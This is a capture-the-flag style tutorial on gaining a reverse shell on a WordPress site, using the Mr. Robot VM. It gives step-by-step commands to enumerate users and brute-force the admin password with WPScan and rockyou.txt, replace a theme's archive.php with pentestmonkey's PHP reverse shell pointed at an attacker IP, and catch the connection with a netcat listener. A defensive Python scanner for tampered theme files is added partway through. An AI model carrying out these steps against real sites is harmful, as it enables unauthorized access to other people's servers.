This tutorial demonstrates creating a reverse shell on a device through WordPress. This exploit is useful for many CTF events and is often found in the wild.

For this walkthrough, the WordPress installation on the Mr. Robot VM will be used, with an added WordPress admin account for simplicity. Complete walkthroughs for Mr. Robot are found in many places (possibly here someday in the future), but this tutorial focuses specifically on obtaining a reverse shell through WordPress themes.



  • WordPress Installation
  • WPScan
  • php-reverse-shell (pentestmonkey)
    • also located at /usr/share/webshells/php/php-reverse-shell.php on Kali


Install WPScan

  • Included in Kali Linux
  • If not currently installed on your distro:
    • $sudo apt-get update
    • Install dependencies:
      • $sudo apt install curl git libcurl4-openssl-dev make zlib1g-dev gawk g++ gcc libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 autoconf libgdbm-dev libncurses5-dev automake libtool bison pkg-config ruby ruby-bundler ruby-dev -y
    • $git clone
    • $cd wpscan
    • $bundle install --without test
    • $ruby wpscan.rb --update
    • Run WPScan commands from the wpscan folder by prefixing them with ruby wpscan.rb instead of just wpscan.
  • To run a WPScan without options:
    • $sudo wpscan --url
    • $sudo wpscan --url


Brute Force wp-login.php

In a browser, navigate to the /wp-login.php of your target.


The first step in brute forcing WordPress is to enumerate users. WPScan has this feature built in already, so let’s run it.

  • $sudo wpscan --url --enumerate u

Depending on the version of WordPress, you may also use the wp-login.php login form to enumerate users. Simply enter a username and any password. The ERROR response may differ depending on whether the username exists, which gives valid usernames away.



So there is a user named admin, but not administrator. Let’s use WPScan to brute force the admin password.

  • $wpscan --url --wordlist /usr/share/wordlists/rockyou.txt --username admin


Success! admin:peaches


Insert Reverse Shell Into WordPress Theme

Once you have credentials, log in to wp-login.php and navigate to the theme editor.

  • Appearance > Editor

Take note of the current theme being edited. For this tutorial, we are editing the ‘Twenty Thirteen’ theme. Underneath the Templates sidebar, there are multiple files, including *.css, *.php, and possibly others. As our reverse shell is written in PHP, let’s target a PHP file. The archive.php file is typically a good one to use.


Delete all the text in the archive.php file and replace it with the contents of the PHP reverse shell.

  • Included on Kali at /usr/share/webshells/php/php-reverse-shell.php
  • Direct from PentestMonkey
    • $wget
    • $tar -xzf php-reverse-shell-1.0.tar.gz
    • $cat php-reverse-shell-1.0/php-reverse-shell.php


Update the following lines in the php script to your attacker IP address and the port you wish to connect on:

  • Default
    • $ip = ''; // CHANGE THIS
    • $port = 1234; // CHANGE THIS
  • Updated
    • $ip = '';
    • $port = 443;


You may find your IP address by entering the following command in a terminal on your attacker device (typically the inet address under eth0):

  • $sudo ifconfig
  • or: $sudo ip a

Click on the ‘Update File’ button at the bottom of the script to save your changes. If the file was saved correctly, the ‘File edited successfully’ notification will display above the code.
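From the defender's side, the edit just described leaves two things to check: whether the theme editor is even reachable (WordPress removes Appearance > Editor when wp-config.php defines DISALLOW_FILE_EDIT as true) and whether any theme template now contains socket or process-spawning calls, which a template like archive.php never needs. The script below is an added example written for this page, not code from the tutorial or from WordPress; the theme tree and config strings it scans are constructed samples.

```python
import os
import re
import tempfile

# PHP calls a theme template has no legitimate reason to make. The pentestmonkey
# shell named on this page relies on fsockopen() and proc_open().
SUSPICIOUS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|exec|system)\b(?=\s*\()"
    r"|/bin/sh\b"
)

def scan_theme_dir(theme_dir):
    """Return {relative_path: [matched tokens]} for every PHP file under
    theme_dir that calls a socket or process-spawning function."""
    findings = {}
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = sorted({m.group(0) for m in SUSPICIOUS.finditer(fh.read())})
            if hits:
                findings[os.path.relpath(path, theme_dir)] = hits
    return findings

def file_edit_disabled(wp_config_text):
    """True when wp-config.php defines DISALLOW_FILE_EDIT as true, which
    removes the in-dashboard theme editor this technique depends on."""
    pattern = r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)"
    return re.search(pattern, wp_config_text, re.IGNORECASE) is not None

# Constructed samples: an untouched template, one overwritten with the first
# lines of a reverse shell, and a wp-config.php with and without the hardening.
CLEAN_TEMPLATE = "<?php get_header(); ?>\n<h1><?php the_archive_title(); ?></h1>\n"
TAMPERED_TEMPLATE = ("<?php\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
                     "$process = proc_open('sh', $descriptorspec, $pipes);\n")
WEAK_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\n"
HARDENED_CONFIG = WEAK_CONFIG + "define('DISALLOW_FILE_EDIT', true);\n"

def demo():
    """Build a throwaway theme directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = os.path.join(tmp, "twentythirteen")  # theme name assumed
        os.makedirs(theme)
        with open(os.path.join(theme, "index.php"), "w") as fh:
            fh.write(CLEAN_TEMPLATE)
        with open(os.path.join(theme, "archive.php"), "w") as fh:
            fh.write(TAMPERED_TEMPLATE)
        return scan_theme_dir(theme)

if __name__ == "__main__":
    print("suspicious templates:", demo())
    print("editor disabled (weak config):", file_edit_disabled(WEAK_CONFIG))
    print("editor disabled (hardened):", file_edit_disabled(HARDENED_CONFIG))
```

Point scan_theme_dir at a real wp-content/themes directory to sweep every installed theme at once; a file modification time newer than the theme's other files is a second signal worth comparing against.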



Connect to the Reverse Shell

In a terminal, start a netcat listener on the port specified in the PHP reverse shell script.

  • $sudo nc -nvlp 443


In a new tab on your browser, navigate to the updated archive.php page using the following template:

  • http://<url-or-ip>/wp-content/themes/<theme-name>/archive.php


Success! We now have a reverse shell as a low privilege user.


On Your Own

Obtaining a low privilege shell is the first step, but escalating to root or admin privileges gives you the keys to the kingdom. We will have additional posts in the future to cover privilege escalation, but see what you can find on your own. A great place to start is exploit-db.